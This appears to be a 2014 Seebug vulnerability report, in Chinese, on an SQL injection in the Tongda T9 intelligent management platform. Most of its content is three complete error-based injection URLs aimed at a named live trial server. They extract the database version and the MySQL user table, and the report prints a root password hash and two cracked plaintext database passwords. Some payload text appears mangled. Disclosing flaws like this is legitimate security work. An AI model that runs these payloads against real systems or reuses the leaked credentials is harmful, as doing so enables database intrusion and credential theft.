T9智能管理平台标准版SQL注入漏洞

2014-03-18T00:00:00
ID SSV:96098
Type seebug
Reporter Root
Modified 2014-03-18T00:00:00

Description

简要描述:

通达T9智能管理平台标准版存在SQL注入漏洞。

详细说明:

通达T9智能管理平台标准版的在线试用地址是http://t9.go2oa.com:86/t9/login.jsp,登陆后,core/funcs/news/show/reNews.jsp页面存在mysql报错注入漏洞,可以获取系统数据信息。 1、http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(),concat(floor(rand(0)2),0x3a,(select @@version from flow_sort limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1

<img src="https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png" alt="20140317215933.png" width="600" onerror="javascript:errimg(this);">

2、爆root用户密码 http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(),concat(floor(rand(0)2),0x3a,(select concat(host,user,password) from mysql.user limit 0,1))a from flow_sort group by a)b where 1=1 or '1'='1

<img src="https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png" alt="20140317220353.png" width="600" onerror="javascript:errimg(this);">

成功爆出root的口令91AF99F23C3D4ED85140D100433725DFA52BECEE,破解后为:myoa888。

<img src="https://images.seebug.org/upload/201403/1722092523c80934ac9823dcca54602c606d5470.png" alt="20140317220907.png" width="600" onerror="javascript:errimg(this);">

3、爆mysql可远程连接的用户密码 http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(),concat(floor(rand(0)2),0x3a,(select concat(host,user,password) from mysql.user limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1

<img src="https://images.seebug.org/upload/201403/1722130768d9df2b63b00ea06db0ac66b6f5bc69.png" alt="20140317221251.png" width="600" onerror="javascript:errimg(this);">

破解后为:cms6_8。 其他数据就不爆了,该注入点权限挺高,可以获取数据库中的所有数据。

漏洞证明:

<img src="https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png" alt="20140317215933.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png" alt="20140317220353.png" width="600" onerror="javascript:errimg(this);">